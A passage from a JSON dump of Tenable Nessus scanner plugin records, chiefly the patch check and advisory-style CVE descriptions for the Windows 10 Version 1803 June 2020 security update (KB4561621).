script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561608.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561608'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561608])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T09:55:13", "description": "The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4561621: Windows 10 Version 1803 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561621.NASL", "href": "https://www.tenable.com/plugins/nessus/137259", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137259);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/14\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561621\");\n script_xref(name:\"MSFT\", value:\"MS20-4561621\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n\n script_name(english:\"KB4561621: Windows 10 Version 1803 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information 